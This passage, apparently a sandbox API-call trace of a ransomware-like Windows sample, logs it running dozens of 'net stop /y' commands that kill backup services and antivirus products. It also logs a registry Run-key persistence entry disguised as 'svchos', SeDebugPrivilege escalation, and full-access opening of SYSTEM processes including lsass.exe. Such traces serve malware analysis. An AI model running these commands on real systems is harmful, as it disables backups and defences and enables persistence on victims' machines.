lpOperation=0x0, lpFile="net", lpParameters="stop VeeamBrokerSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0117.366] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamCatalogSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0117.693] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamCloudSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0117.795] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamDeploymentService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0117.955] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamDeploySvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0118.117] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamEnterpriseManagerSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0118.208] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamMountSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0118.283] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamNFSSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0118.659] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamRESTSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.035] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamTransportSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.095] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop W3Svc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.249] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop wbengine /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.314] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop WRSVC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.517] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$VEEAMSQL2008R2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.584] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$VEEAMSQL2008R2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0119.729] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamHvIntegrationSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.086] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop swi_update /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.198] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$CXDB /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.361] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$CITRIX_METAFRAME /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.423] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"SQL Backups\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.554] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$PROD /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.885] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Zoolz 2 Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.154] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLServerADHelper /y ", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.241] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$PROD /y ", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.470] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop msftesql$PROD /y ", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.619] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop NetMsmqActivator /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.808] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop EhttpSrv /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0121.942] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ekrn /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.188] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ESHASRV /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.259] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SOPHOS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.295] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SOPHOS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.341] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop AVP /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.390] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop klnagent /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.453] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SQLEXPRESS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0122.514] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SQLEXPRESS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0123.165] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop wbengine /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0123.324] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop kavfsslp /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0123.521] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop KAVFSGT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0123.897] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop KAVFS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0124.196] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop mfefire /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0124.269] GetVersionExW (in: lpVersionInformation=0x10e0a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10e0a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0124.270] GetWindowsDirectoryW (in: lpBuffer=0x10d7f0, uSize=0x64 | out: lpBuffer="C:\\Windows") returned 0xa [0124.270] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77550000 [0124.270] GetProcAddress (hModule=0x77550000, lpProcName="IsWow64Process") returned 0x775591d0 [0124.270] GetCurrentProcess () returned 0xffffffffffffffff [0124.270] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x10d790 | out: Wow64Process=0x10d790) returned 1 [0124.270] FreeLibrary (hLibModule=0x77550000) returned 1 [0124.270] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10ddc0, nSize=0x140 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe")) returned 0x2f [0124.270] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0124.292] SetLastError (dwErrCode=0x0) [0124.292] GetCurrentThread () returned 0xfffffffffffffffe [0124.292] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=0, TokenHandle=0x10e090 | out: TokenHandle=0x10e090*=0x0) returned 0 [0124.292] GetLastError () returned 0x3f0 [0124.292] ImpersonateSelf (ImpersonationLevel=0x2) returned 1 [0124.293] GetCurrentThread () returned 0xfffffffffffffffe [0124.293] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=0, TokenHandle=0x10e090 | out: TokenHandle=0x10e090*=0x1b4) returned 1 [0124.293] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10e040 | out: lpLuid=0x10e040*(LowPart=0x14, HighPart=0)) returned 1 [0124.293] AdjustTokenPrivileges (in: TokenHandle=0x1b4, DisableAllPrivileges=0, NewState=0x10e048*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0124.293] GetLastError () returned 0x0 [0124.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x90 [0124.296] Process32FirstW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.297] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0124.297] SetLastError (dwErrCode=0x0) [0124.297] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0124.297] CloseHandle (hObject=0x0) returned 0 [0124.297] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0124.298] SetLastError (dwErrCode=0x0) [0124.298] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x104) returned 0x240 [0124.298] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x8c) returned 1 [0124.298] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x0, ReturnLength=0x10ddd0) returned 0 [0124.298] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.298] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.299] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b50f0, cchName=0x10ddd8, ReferencedDomainName=0x2ab6a0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.300] CloseHandle (hObject=0x240) returned 1 [0124.300] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.301] SetLastError (dwErrCode=0x0) [0124.301] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x148) returned 0x240 [0124.301] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x19c) returned 1 [0124.301] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.301] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.301] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.301] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b5190, cchName=0x10ddd8, ReferencedDomainName=0x2aba00, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.302] CloseHandle (hObject=0x240) returned 1 [0124.302] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0124.303] SetLastError (dwErrCode=0x0) [0124.303] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x178) returned 0x240 [0124.303] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x220) returned 1 [0124.303] GetTokenInformation (in: TokenHandle=0x220, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.303] GetTokenInformation (in: TokenHandle=0x220, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.303] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.303] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b51d0, cchName=0x10ddd8, ReferencedDomainName=0x2ab6a0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.304] CloseHandle (hObject=0x240) returned 1 [0124.304] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.304] SetLastError (dwErrCode=0x0) [0124.304] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x184) returned 0x240 [0124.304] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xf8) returned 1 [0124.304] GetTokenInformation (in: TokenHandle=0xf8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.305] GetTokenInformation (in: TokenHandle=0xf8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.305] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.305] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b50f0, cchName=0x10ddd8, ReferencedDomainName=0x2aba00, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.589] CloseHandle (hObject=0x240) returned 1 [0124.589] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0124.589] SetLastError (dwErrCode=0x0) [0124.589] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1b0) returned 0x240 [0124.589] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x1c8) returned 1 [0124.589] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.590] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.590] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.590] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b5190, cchName=0x10ddd8, ReferencedDomainName=0x2ab6a0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.590] CloseHandle (hObject=0x240) returned 1 [0124.590] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0124.591] SetLastError (dwErrCode=0x0) [0124.591] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1d4) returned 0x240 [0124.591] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x248) returned 1 [0124.591] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.591] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.591] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.592] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b51d0, cchName=0x10ddd8, ReferencedDomainName=0x2aba00, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.592] CloseHandle (hObject=0x240) returned 1 [0124.592] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0124.593] SetLastError (dwErrCode=0x0) [0124.593] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1dc) returned 0x240 [0124.593] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xdc) returned 1 [0124.593] GetTokenInformation (in: TokenHandle=0xdc, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.593] GetTokenInformation (in: TokenHandle=0xdc, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.593] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.594] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b50f0, cchName=0x10ddd8, ReferencedDomainName=0x2ab6a0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.594] CloseHandle (hObject=0x240) returned 1 [0124.594] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0124.595] SetLastError (dwErrCode=0x0) [0124.595] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1e4) returned 0x240 [0124.595] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xec) returned 1 [0124.595] GetTokenInformation (in: TokenHandle=0xec, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.595] GetTokenInformation (in: TokenHandle=0xec, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.595] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.596] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b5190, cchName=0x10ddd8, ReferencedDomainName=0x2aba00, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.596] CloseHandle (hObject=0x240) returned 1 [0124.596] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, 